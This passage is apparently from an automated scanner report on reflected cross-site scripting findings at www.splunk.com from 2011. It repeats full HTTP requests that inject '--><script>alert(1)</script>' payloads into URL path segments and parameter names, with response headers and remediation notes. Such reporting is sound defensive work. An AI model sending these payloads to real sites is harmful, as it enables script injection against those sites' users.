GET /view/long-taile7a52--><script>alert(1)</script>4d9b54343ec/SP-CAAAE7F HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload 85de3--><script>alert(1)</script>3571f6545de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/long-tail/SP-CAAAE7F85de3--><script>alert(1)</script>3571f6545de HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.571. http://www.splunk.com/view/long-tail/SP-CAAAE7F [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/long-tail/SP-CAAAE7F
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8a1f0--><script>alert(1)</script>5a312b3cb47 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/long-tail/SP-CAAAE7F?8a1f0--><script>alert(1)</script>5a312b3cb47=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:16:13 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 72c321fdf9581667fdac28c406835d9a1296944174 Last-Modified: Sat, 05 Feb 2011 22:16:14 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40975
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 4319d--><script>alert(1)</script>c64dabdb035 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view4319d--><script>alert(1)</script>c64dabdb035/operational-intelligence/SP-CAAAFVM HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:03:16 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 4023dc159e9b83d168f95b1fa75b8ff71297008196 Last-Modified: Sun, 06 Feb 2011 16:03:16 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload edb7d--><script>alert(1)</script>579a2b57a1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/operational-intelligenceedb7d--><script>alert(1)</script>579a2b57a1d/SP-CAAAFVM HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:03:39 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: e96a24ae34b1bce7f5c6f052169ac2121297008220 Last-Modified: Sun, 06 Feb 2011 16:03:40 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload a74fe--><script>alert(1)</script>40c1e0236d0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/operational-intelligence/SP-CAAAFVMa74fe--><script>alert(1)</script>40c1e0236d0 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:04:04 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 85513a3ad631e0b73124ee10794176841297008245 Last-Modified: Sun, 06 Feb 2011 16:04:05 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18431
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.575. http://www.splunk.com/view/operational-intelligence/SP-CAAAFVM [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/operational-intelligence/SP-CAAAFVM
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8d22f--><script>alert(1)</script>7fb96a5a4c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/operational-intelligence/SP-CAAAFVM?8d22f--><script>alert(1)</script>7fb96a5a4c5=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:02:50 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: d4e17969e3e731fa2654310d806a351b1297008170 Last-Modified: Sun, 06 Feb 2011 16:02:50 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 32287
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 7ee0d--><script>alert(1)</script>90cf28c60a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view7ee0d--><script>alert(1)</script>90cf28c60a4/partner-directory/SP-CAAABCY HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload fa6a6--><script>alert(1)</script>bca2a328383 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/partner-directoryfa6a6--><script>alert(1)</script>bca2a328383/SP-CAAABCY HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:18:00 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:48:00 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:48:00 GMT; path=/ ETag: d4a72a1859cc3eec633d6a46b6a389671296944281 Last-Modified: Sat, 05 Feb 2011 22:18:01 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload b6f96--><script>alert(1)</script>eccde78041c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/partner-directory/SP-CAAABCYb6f96--><script>alert(1)</script>eccde78041c HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:18:33 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:48:33 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:48:33 GMT; path=/ ETag: dc0ae186bafdfcac90974860acc726351296944314 Last-Modified: Sat, 05 Feb 2011 22:18:34 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18403
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.579. http://www.splunk.com/view/partner-directory/SP-CAAABCY [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/partner-directory/SP-CAAABCY
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload f9453--><script>alert(1)</script>a09244ca107 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/partner-directory/SP-CAAABCY?f9453--><script>alert(1)</script>a09244ca107=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:16:42 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 82487
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 6c8f0--><script>alert(1)</script>4a32196ba0d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view6c8f0--><script>alert(1)</script>4a32196ba0d/partner-programs/SP-CAAACED HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; 